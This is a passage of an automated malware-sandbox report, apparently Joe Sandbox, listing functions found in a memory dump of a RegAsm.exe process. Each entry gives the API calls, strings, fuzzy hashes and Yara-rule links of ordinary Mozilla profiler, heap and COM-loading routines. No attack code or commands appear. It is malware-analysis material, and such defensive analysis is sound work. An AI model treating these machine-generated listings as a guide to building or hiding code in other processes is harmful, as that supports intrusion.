                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 1880959753-0
                                                                            • Opcode ID: ebcb6e301a00faaf143ae2bbd784498adb6af81b87cf87779cd58181d6bcb967
                                                                            • Instruction ID: cb0a82b2f0db93b956465db9ded3e4cc19976113097c018a5294d4f85013352e
                                                                            • Opcode Fuzzy Hash: ebcb6e301a00faaf143ae2bbd784498adb6af81b87cf87779cd58181d6bcb967
                                                                            • Instruction Fuzzy Hash: 0B4164B52017009FCB10CF69C498B5ABBF9FB89318F10446EE9AA87B41DB71F854CB94
                                                                            Function 6CC9AAB0 Relevance: 10.6, APIs: 7, Instructions: 86memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBE220,?), ref: 6CC9BC2D
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBE220), ref: 6CC9BC42
                                                                            • RtlFreeHeap.NTDLL(?,00000000,6CCAE300), ref: 6CC9BC82
                                                                            • RtlFreeUnicodeString.NTDLL(6CCBE210), ref: 6CC9BC91
                                                                            • RtlFreeUnicodeString.NTDLL(6CCBE208), ref: 6CC9BCA3
                                                                            • RtlFreeHeap.NTDLL(?,00000000,6CCBE21C), ref: 6CC9BCD2
                                                                            • free.MOZGLUE(?), ref: 6CC9BCD8
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                            • String ID:
                                                                            • API String ID: 3047341122-0
                                                                            • Opcode ID: 7cf9629259b70dbcf1d497044db4d001dcbd192c0838a8db690cee31d3d834c8
                                                                            • Instruction ID: 4d0bf74949fda242cdcebb9f957febb3c08e6ad0da31121213caa23ffa412deb
                                                                            • Opcode Fuzzy Hash: 7cf9629259b70dbcf1d497044db4d001dcbd192c0838a8db690cee31d3d834c8
                                                                            • Instruction Fuzzy Hash: 1121FF72A00705AFE3208F46C880B66B7B8FF41718F148469E91A9BA10EB35F846CBD1
                                                                            Function 6CC438A0 Relevance: 10.6, APIs: 7, Instructions: 80memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBE220,?,?,?,?,6CC43899,?), ref: 6CC438B2
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBE220,?,?,?,6CC43899,?), ref: 6CC438C3
                                                                            • free.MOZGLUE(00000000,?,?,?,6CC43899,?), ref: 6CC438F1
                                                                            • RtlFreeHeap.NTDLL(?,00000000,?), ref: 6CC43920
                                                                            • RtlFreeUnicodeString.NTDLL(-0000000C,?,?,?,6CC43899,?), ref: 6CC4392F
                                                                            • RtlFreeUnicodeString.NTDLL(-00000014,?,?,?,6CC43899,?), ref: 6CC43943
                                                                            • RtlFreeHeap.NTDLL(?,00000000,0000002C), ref: 6CC4396E
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Free$ExclusiveHeapLockStringUnicode$AcquireReleasefree
                                                                            • String ID:
                                                                            • API String ID: 3047341122-0
                                                                            • Opcode ID: 7cbc156125db256caabd5373d54ac80fb1d1d4e85ea225023b3518bd97a626a4
                                                                            • Instruction ID: effeb415e0b3bdc624c5972bd2ad697245cf154774d3e70c63b45919c07aac4e
                                                                            • Opcode Fuzzy Hash: 7cbc156125db256caabd5373d54ac80fb1d1d4e85ea225023b3518bd97a626a4
                                                                            • Instruction Fuzzy Hash: F221F172600614DFD720DF65C884B86B7B9EF85328F19C429E95A97B10E735F846CB90
                                                                            Function 6CC784E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC784F3
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7850A
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7851E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7855B
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7856F
                                                                            • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC785AC
                                                                              • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC7767F
                                                                              • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC77693
                                                                              • Part of subcall function 6CC77670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC785B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC776A7
                                                                            • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6CC785B2
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                            • String ID:
                                                                            • API String ID: 2666944752-0
                                                                            • Opcode ID: e605cb9b147a7111abbd5410d7fcf34cc84e72795510a9a93720eb420cfbb820
                                                                            • Instruction ID: 4d10ac50577aada7d362b61e3a0208b1fa88210924dcbc24274bf3900a8d925e
                                                                            • Opcode Fuzzy Hash: e605cb9b147a7111abbd5410d7fcf34cc84e72795510a9a93720eb420cfbb820
                                                                            • Instruction Fuzzy Hash: 03218D742006018FEB24DB64D888E5AB7B5FF4430CF14482DE65B93B41EB35F959CB65
                                                                            Function 6CC41640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,00000000,00000114), ref: 6CC41699
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416CB
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416D7
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416DE
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416E5
                                                                            • VerSetConditionMask.NTDLL ref: 6CC416EC
                                                                            • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6CC416F9
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ConditionMask$InfoVerifyVersionmemset
                                                                            • String ID:
                                                                            • API String ID: 375572348-0
                                                                            • Opcode ID: e24f57c6cc0dcdbc0680845e64a71ef5d9877aeed16889d08876a397a2388276
                                                                            • Instruction ID: 2925a08fddee8f5a54bbaee1171f1445e7a55aefe934bad04d5e26a7ccde79d0
                                                                            • Opcode Fuzzy Hash: e24f57c6cc0dcdbc0680845e64a71ef5d9877aeed16889d08876a397a2388276
                                                                            • Instruction Fuzzy Hash: 8A21D5B07402086FEB115BA8CC85FFB737CEF86704F008568F6459B280D678DD5486A1
                                                                            Function 6CC8D1D0 Relevance: 10.6, APIs: 7, Instructions: 74threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D1EC
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D1F5
                                                                              • Part of subcall function 6CC8AD40: moz_malloc_usable_size.MOZGLUE(?), ref: 6CC8AE20
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D211
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8D217
                                                                            • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D226
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D279
                                                                            • free.MOZGLUE(?), ref: 6CC8D2B2
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
                                                                            • String ID:
                                                                            • API String ID: 3049780610-0
                                                                            • Opcode ID: 76f9d468145eefffe3a8ea2ea4ac992c6c9340ddfca5001b599fad8b3393750a
                                                                            • Instruction ID: 9018763d0e57128db53b5253077ad3a31de6d0816aa7121a2af032e18bf65e10
                                                                            • Opcode Fuzzy Hash: 76f9d468145eefffe3a8ea2ea4ac992c6c9340ddfca5001b599fad8b3393750a
                                                                            • Instruction Fuzzy Hash: 3C218B717047059FCB04DF64C498A9EBBB1FF8A328F10462EF51A87340EB34A809CB96
                                                                            Function 6CC7F5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F619
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6CC7F598), ref: 6CC7F621
                                                                              • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                              • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC7F637
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F645
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8,?,?,00000000,?,6CC7F598), ref: 6CC7F663
                                                                            Strings
                                                                            • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6CC7F62A
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                            • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                            • API String ID: 1579816589-753366533
                                                                            • Opcode ID: c714ea776e7f8b3f81ded6a531ee0fa0fb2d99447b1f5984636899f167b7c6da
                                                                            • Instruction ID: 4778df622c67525bb7c54f3533e28710fa10add5ef69b097b7c5efe91115fbe4
                                                                            • Opcode Fuzzy Hash: c714ea776e7f8b3f81ded6a531ee0fa0fb2d99447b1f5984636899f167b7c6da
                                                                            • Instruction Fuzzy Hash: 7311A379201205AFCB54AFA9C9989A5B779FF86758B100016FA0587F01EB71EC21CBB4
                                                                            Function 6CC42070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • LoadLibraryW.KERNEL32(combase.dll,6CC41C5F), ref: 6CC420AE
                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6CC420CD
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC420E1
                                                                            • FreeLibrary.KERNEL32 ref: 6CC42124
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                            • String ID: CoInitializeSecurity$combase.dll
                                                                            • API String ID: 4190559335-2476802802
                                                                            • Opcode ID: 2e1e177a3e7b781c2ed851fa9a27d512037c1acfad0a9bfa6c3213e98608d4e1
                                                                            • Instruction ID: cdf4e73a16d7355498c12083d25a2eb043f2d541ade559201004c174f854c738
                                                                            • Opcode Fuzzy Hash: 2e1e177a3e7b781c2ed851fa9a27d512037c1acfad0a9bfa6c3213e98608d4e1
                                                                            • Instruction Fuzzy Hash: 3A216A7A200209EFDF118F99DD99D9A3BB6FB4A325F008018FA0592710E7719866DF65
                                                                            Function 6CC799A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                              • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                              • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC799C1
                                                                            • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC799CE
                                                                            • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC799F8
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC79A05
                                                                            • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC79A0D
                                                                              • Part of subcall function 6CC79A60: GetCurrentThreadId.KERNEL32 ref: 6CC79A95
                                                                              • Part of subcall function 6CC79A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC79A9D
                                                                              • Part of subcall function 6CC79A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6CC79ACC
                                                                              • Part of subcall function 6CC79A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC79BA7
                                                                              • Part of subcall function 6CC79A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6CC79BB8
                                                                              • Part of subcall function 6CC79A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6CC79BC9
                                                                              • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                              • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                            Strings
                                                                            • [I %d/%d] profiler_stream_json_for_this_process, xrefs: 6CC79A15
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
                                                                            • String ID: [I %d/%d] profiler_stream_json_for_this_process
                                                                            • API String ID: 2359002670-141131661
                                                                            • Opcode ID: f0a2efc5007bff6f59406b315dfd2d7b5150e79bce8d081302d1d07dbed33054
                                                                            • Instruction ID: f143143c30bd3b6349c7f2ce372984f59e0cb16a361a2c7dfb744bef3f6f2111
                                                                            • Opcode Fuzzy Hash: f0a2efc5007bff6f59406b315dfd2d7b5150e79bce8d081302d1d07dbed33054
                                                                            • Instruction Fuzzy Hash: B201263EA041249FDF205FE994586A97B78EF47268F044016FD0553F01F7744C44CABA
                                                                            Function 6CC41FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • LoadLibraryW.KERNEL32(combase.dll,?), ref: 6CC41FDE
                                                                            • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6CC41FFD
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC42011
                                                                            • FreeLibrary.KERNEL32 ref: 6CC42059
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                            • String ID: CoCreateInstance$combase.dll
                                                                            • API String ID: 4190559335-2197658831
                                                                            • Opcode ID: 97dc4c378ef58d7301fb0ca69b3c3e1fc0db59724173afac8a544d8d37624cfa
                                                                            • Instruction ID: 7bb09187a104818e4711fcb221c36e0437221380d3f725931d81ba8d7a227d7c
                                                                            • Opcode Fuzzy Hash: 97dc4c378ef58d7301fb0ca69b3c3e1fc0db59724173afac8a544d8d37624cfa
                                                                            • Instruction Fuzzy Hash: 75117C7C201204AFDF20CF95CAA9E967BB9EF8635AF008029F905D3750E731A805DB65
                                                                            Function 6CC40EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • LoadLibraryW.KERNEL32(combase.dll,00000000,?,6CC6D9F0,00000000), ref: 6CC40F1D
                                                                            • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6CC40F3C
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC40F50
                                                                            • FreeLibrary.KERNEL32(?,6CC6D9F0,00000000), ref: 6CC40F86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                            • String ID: CoInitializeEx$combase.dll
                                                                            • API String ID: 4190559335-2063391169
                                                                            • Opcode ID: e49932e3503dd845d8caf27f69aa5285c6ad079242e534b5142fae23961b475e
                                                                            • Instruction ID: 95b6fa3e6f6fb75e1b225d5c36bb87106c8efdef1d3c7919324f75b502647d18
                                                                            • Opcode Fuzzy Hash: e49932e3503dd845d8caf27f69aa5285c6ad079242e534b5142fae23961b475e
                                                                            • Instruction Fuzzy Hash: A611527D7452819FEF00DFE9CA58A863774FB9A326F008629ED0592B41F770A409CA69
                                                                            Function 6CC462E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                              • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                            • LoadLibraryW.KERNEL32(combase.dll), ref: 6CC4631B
                                                                            • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 6CC4633A
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC4634E
                                                                            • FreeLibrary.KERNEL32 ref: 6CC46376
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
                                                                            • String ID: CoUninitialize$combase.dll
                                                                            • API String ID: 4190559335-3846590027
